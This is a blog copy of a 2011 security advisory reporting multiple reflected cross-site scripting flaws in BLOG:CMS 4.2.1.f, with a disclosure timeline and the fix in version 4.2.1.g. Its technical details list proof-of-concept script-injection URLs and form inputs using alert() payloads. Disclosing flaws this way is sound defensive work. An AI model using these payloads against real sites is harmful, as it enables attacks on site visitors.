Warning: opendir(/var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/sh/3.0.83.2/scripts/): failed to open dir: No such file or directory in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 26

Warning: Invalid argument supplied for foreach() in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 170
Skip to content

SSCHADV2011-007 - Multiple Cross-Site Scripting vulnerabilities in BLOG:CMS

Advisory: Multiple Cross-Site Scripting vulnerabilities in BLOG:CMS
Advisory ID: SSCHADV2011-007
Author:
Stefan Schurtz
Affected Software: Version 4.2.1.f and probably prior versions
Vendor URL: http://www.blogcms.com
Vendor Status:
resolved
CVE-ID: -
 
======================
Vulnerability Description:
======================

This is a Cross-Site Scripting vulnerability

==============
Technical Details:
==============
 
Firefox 3.6.17

http://www.example.com/blogcms/photo/index.php?"<script>alert(0×0029A)</script>
http://www.example.com/blogcms/photo/index.php?"<script>alert(‘XSS’);</script>

http://www.example.com/blogcms/photo/templates/admin_default/confirm.tpl.php?nsextt="<script>alert(‘XSS’);</script>
http://www.example.com/blogcms/photo/templates/admin_default/confirm.tpl.php?nsextt="<script>alert(0×0029A)</script>

http://www.example.com/blogcms/admin/plugins/mailtoafriend/mailfriend.php

From [email]: <script>alert(‘XSS’);</script>
To [email]: <script>alert(‘XSS’);</script>
To [name]: <script>alert(‘XSS’);</script>

Firefox 4.0.1 / IE8

http://www.example.com/blogcms/photo/index.php?"</script><script>alert(‘XSS’);</script>
http://www.example.com/blogcms/photo/index.php?"</script><script>alert(0×0029A)</script>

http://www.example.com/blogcms/photo/templates/admin_default/confirm.tpl.php?nsextt="</script><script>alert(‘XSS’);</script>
http://www.example.com/blogcms/photo/templates/admin_default/confirm.tpl.php?nsextt="</script><script>alert(0×0029A)</script>

http://www.example.com/blogcms/admin/plugins/mailtoafriend/mailfriend.php

From [email]: </script><script>alert(‘XSS’);</script>
To [email]: </script><script>alert(‘XSS’);</script>
To [name]: </script><script>alert(‘XSS’);</script>

=====
Solution:
=====

Update to the latest version 4.2.1.g

================
Disclosure Timeline:
================

03-Jun-2011 – informed developers
03-Jun-2011 – Release date of this security advisory
06-Jun-2011 – new version 4.2.1.g released
07-Jun-2011 – post on BugTraq and Full-disclosure


====
Credits:
====

Vulnerabilities found and advisory written by Stefan Schurtz.

=======
References:
=======

http://www.blogcms.com
http://www.rul3z.de/advisories/SSCHADV2011-007.txt

Trackbacks

No Trackbacks

Comments

Display comments as Linear | Threaded

No comments

Add Comment


To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA 1CAPTCHA 2CAPTCHA 3CAPTCHA 4CAPTCHA 5


Textile-formatting allowed
You can use [geshi lang=lang_name [,ln={y|n}]][/geshi] tags to embed source code snippets.
Form options
Imprint | Contact | Privacy Statement

Warning: opendir(/var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/sh/3.0.83.2/scripts/): failed to open dir: No such file or directory in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 26

Warning: Invalid argument supplied for foreach() in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 170